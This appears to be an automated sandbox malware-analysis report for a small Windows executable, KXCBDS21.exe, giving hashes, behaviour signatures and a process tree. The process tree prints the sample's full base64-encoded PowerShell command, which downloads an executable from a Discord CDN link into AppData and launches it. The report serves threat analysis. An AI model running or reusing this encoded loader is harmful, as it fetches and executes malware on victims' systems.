Analysis

  • max time kernel
    147s
  • max time network
    166s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
  • submitted
    06-12-2022 07:15

General

  • Target

    KXCBDS21.exe

  • Size

    6KB

  • MD5

    6645e5ca45fe6a10f0b8074e6eb9446d

  • SHA1

    55f764b18942e6ec6ae6c8b98cf2cf465cec3d28

  • SHA256

    c4a7879913019bb57160451e088ea2cd02386406204af973201ce7ac507c186c

  • SHA512

    75310173106c1be9adbd374de49408d96dd024fd7c853195f35bfe8bbf4cf12c0b2be2af3c388dfe35c1f083140a1716b1221772911a2af69cc7166be19163d0

  • SSDEEP

    96:MmvzgD79ClVCFjoYD9uJLNjNTyAYxsNvk+W+jD1TIoDcW33jJWw3d3ojXrl:MmU9CKFrDsNjNLYuvkkeW33jJWed8

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\KXCBDS21.exe
    "C:\Users\Admin\AppData\Local\Temp\KXCBDS21.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1476
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAZQBnACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANAA5ADQAMQAwADIAMQA3ADQAMgAwADUAMwAzADgAMgAwAC8AMQAwADQAOQA0ADEANwA1ADQANAA5ADQAMAA5ADMAMwAxADUAMAAvAGwAYwBvAG0AcABsAGMAbQBwAG8ALgBlAHgAZQAnACwAIAA8ACMAdQBhAGkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBzAG4AagAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBuAHAAaAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBKAEQAUwBEAFMANAAuAGUAeABlACcAKQApADwAIwB3AHAAeAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBhAG4AawAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwBkAGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcASgBEAFMARABTADQALgBlAHgAZQAnACkAPAAjAGUAYgBoACMAPgA="
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:560

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/560-56-0x0000000000000000-mapping.dmp
  • memory/560-58-0x000007FEF3900000-0x000007FEF4323000-memory.dmp
    Filesize

    10.1MB

  • memory/560-60-0x00000000022D4000-0x00000000022D7000-memory.dmp
    Filesize

    12KB

  • memory/560-59-0x000007FEF2DA0000-0x000007FEF38FD000-memory.dmp
    Filesize

    11.4MB

  • memory/560-61-0x00000000022DB000-0x00000000022FA000-memory.dmp
    Filesize

    124KB

  • memory/560-62-0x00000000022D4000-0x00000000022D7000-memory.dmp
    Filesize

    12KB

  • memory/1476-54-0x0000000000380000-0x0000000000388000-memory.dmp
    Filesize

    32KB

  • memory/1476-55-0x000007FEFC101000-0x000007FEFC103000-memory.dmp
    Filesize

    8KB